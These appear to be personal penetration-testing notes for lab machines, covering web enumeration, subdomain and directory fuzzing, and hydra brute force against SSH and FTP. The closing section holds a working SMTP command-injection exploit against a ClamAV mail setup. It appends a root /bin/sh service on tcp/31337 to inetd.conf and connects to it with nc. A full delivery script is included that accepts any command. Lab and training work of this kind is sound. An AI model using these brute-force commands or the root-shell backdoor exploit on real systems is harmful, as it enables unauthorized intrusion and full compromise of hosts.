Manual

HTTP(s)

robots.txt

Box name? Does it hint at the software in play, like ClamAV?

source

inspect

domain?
    if a domain or hostname turns up, add it to /etc/hosts and run the scans again against that name (the vhost may serve different content than the IP)
    DNS fuzz subdomains

HTTPS?
    if you find HTTPS, take a look at the certificate: the subject CN and the subjectAltName entries often leak hostnames and internal domains
    
nikto -ask=no -h http://192.168.81.56:8080 2>&1 | tee "tcp_8080_http_nikto.txt"

is it python?
    SSTI (server-side template injection)

Fuzz:
/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
/usr/share/wordlists/dirb/big.txt
/usr/share/wordlists/dirb/common.txt
/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
/usr/share/wordlists/dirbuster/directories.jbrofuzz
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
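The certificate, /etc/hosts and fuzzing steps above, put together as one helper. This is an added example and not part of the original notes; it assumes openssl, ffuf and gobuster are installed, uses the wordlist paths listed above plus a SecLists subdomain list, and the certificate text it parses in dry-run mode is a constructed sample, not output from a real target.

```shell
#!/bin/sh
# Added example, not from the original notes: take hostnames from the HTTPS
# certificate, pin them in /etc/hosts, then fuzz paths and subdomains
# against the name. Assumes openssl, ffuf and gobuster are installed;
# the web wordlists are the ones listed in the notes.

# Print every hostname a certificate carries (subject CN plus the DNS:
# entries of subjectAltName), one per line, first-seen order, no repeats.
# Input: the text form of the certificate (openssl x509 -text) on stdin.
cert_hosts() {
    cert=$(cat)
    {
        printf '%s\n' "$cert" | grep -E 'Subject:|subject=' \
            | sed -n 's/.*CN *= *\([^,/]*\).*/\1/p'
        printf '%s\n' "$cert" | grep -o 'DNS:[^,[:space:]]*' | cut -d: -f2
    } | awk 'NF && !seen[$0]++'
}

# Pull the certificate from a live port and hand it to cert_hosts.
tls_hosts() {  # tls_hosts <ip> <port>
    openssl s_client -connect "$1:$2" </dev/null 2>/dev/null \
        | openssl x509 -noout -text | cert_hosts
}

# Map the discovered names to the target IP (writing /etc/hosts needs root).
# Wildcard names are skipped; they only tell you which domain to fuzz.
pin_hosts() {  # pin_hosts <ip> <host>...
    ip=$1; shift
    for h in "$@"; do
        case $h in \*.*) continue ;; esac
        grep -q "[[:space:]]$h\$" /etc/hosts || printf '%s %s\n' "$ip" "$h" >>/etc/hosts
    done
}

# Directory and file fuzzing with the wordlists from the notes, one result
# file per list so hits from different lists can be compared.
fuzz_web() {  # fuzz_web <base-url> <outdir>
    mkdir -p "$2"
    for wl in \
        /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
        /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
        /usr/share/wordlists/dirb/common.txt \
        /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    do
        [ -r "$wl" ] || continue
        ffuf -u "$1/FUZZ" -w "$wl" -mc 200,204,301,302,307,401,403 \
            -of json -o "$2/$(basename "$wl" .txt).json"
    done
}

# Subdomain discovery for a domain taken from the certificate: DNS brute
# force first, then virtual-host fuzzing straight at the IP, which also
# finds names that have no DNS record (-ac filters out the default page).
fuzz_subdomains() {  # fuzz_subdomains <domain> <ip>
    wl=/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
    gobuster dns -d "$1" -w "$wl"
    ffuf -u "http://$2/" -w "$wl" -H "Host: FUZZ.$1" -ac
}

# Constructed sample of what openssl x509 -text prints, for a dry run.
SAMPLE_CERT='Certificate:
    Data:
        Issuer: CN = Example Lab CA
        Subject: C = US, O = Example, CN = www.example.com
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:www.example.com, DNS:dev.example.com, DNS:*.internal.example.com'

sample_hosts() { printf '%s\n' "$SAMPLE_CERT" | cert_hosts; }

case "${1:-}" in
    demo) sample_hosts ;;                  # www.example.com, dev.example.com, *.internal.example.com
    live) tls_hosts "$2" "${3:-443}" ;;    # ./web_enum.sh live 192.168.81.56 443
esac
```

Typical flow on a box: `tls_hosts <ip> 443`, `pin_hosts <ip> <names>`, then `fuzz_web http://<name> scans/` and `fuzz_subdomains <domain> <ip>`; the issuer CN is deliberately ignored because it names the CA, not the target.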

SSH

hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/user/PGAGAIN/Banzai/192.168.81.56/scans/tcp_22_ssh_hydra.txt" ssh://192.168.81.56

FTP

Anonymous login
    can anonymous upload, and does the FTP root map onto the web root? (upload a test file and request it over HTTP)

ls -al
    to list everything in the directory, including hidden dot-files
    
Bruteforce with:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 21 -o "/home/user/PGAGAIN/Banzai/192.168.81.56/scans/tcp_21_ftp_hydra.txt" ftp://192.168.81.56


wget -m ftp://anonymous:anonymous@192.168.234.110 #Download all
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download all in active mode, for when passive transfers hang

SMTP


smtp-user-enum -M VRFY -U "/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt" -t 192.168.81.56 -p 25 2>&1

smtp-user-enum -M VRFY -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -t 192.168.81.56 -p 25 2>&1

SNMP

snmp-check 192.168.120.94

SMTP command injection (ClamAV box)

Talk to the mail port (nc -nv 192.168.89.42 25) and send:
mail from: hell@gmail.com
rcpt to: nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf"@localhost
    the command appends an inetd service that hands out a root shell on tcp/31337; once inetd has re-read its config, connect to it:
nc -nv 192.168.89.42 31337

Same thing scripted, any command via -c:
go run clamav.go -h 192.168.89.42 -p 25 -c "echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf"
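The SMTP exchange above as a script, with the injected command supplied per run the way the clamav.go helper takes it with -c. This is an added example and not the original notes' clamav.go; the mail from / rcpt to lines are the ones from the notes, the helo, data and quit lines are ordinary SMTP framing added so the server accepts the message and processes the recipient, and the target IP and port are placeholders.

```shell
#!/bin/sh
# Added example, not from the original notes: the SMTP exchange above as a
# script, with the injected command supplied per run the way the notes'
# clamav.go helper takes it with -c. Target IP and port are placeholders.

# Print the SMTP dialogue, one command per line. The command to execute is
# carried in the "+detail" part of the recipient, quoted and piped, exactly
# as in the notes; helo/data/quit are ordinary SMTP framing so the server
# accepts the message and processes the recipient. Double quotes inside
# <command> would break the address syntax, so keep payloads to single quotes.
smtp_session() {  # smtp_session <command>
    cat <<EOF
helo localhost
mail from: hell@gmail.com
rcpt to: nobody+"|$1"@localhost
data
Subject: test

x
.
quit
EOF
}

# The line the notes append to /etc/inetd.conf: a root /bin/sh bound to
# tcp/31337, which is why the follow-up nc in the notes goes to 31337.
INETD_LINE='31337 stream tcp nowait root /bin/sh -i'
inetd_payload() { printf "echo '%s' >> /etc/inetd.conf" "$INETD_LINE"; }

# Deliver the session: CRLF line endings and a pause after each command so
# the reply arrives before the next one is sent. Replies are printed by nc;
# a 250 after the rcpt line means the address was accepted. The inetd entry
# only starts listening once inetd re-reads its configuration, so verify
# with: nc -nv <ip> 31337
send_smtp() {  # send_smtp <ip> <port> <command>
    smtp_session "$3" | while IFS= read -r line; do
        printf '%s\r\n' "$line"
        sleep 2
    done | nc -nv "$1" "$2"
}

case "${1:-}" in
    show) smtp_session "$(inetd_payload)" ;;                 # print the dialogue only
    send) send_smtp "$2" "${3:-25}" "$(inetd_payload)" ;;    # ./smtp_inject.sh send 192.168.89.42 25
esac
```

Run `show` first to eyeball the exact bytes that will go over the wire; `send_smtp <ip> 25 "<other command>"` reuses the same session for any other payload, as the -c flag does.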
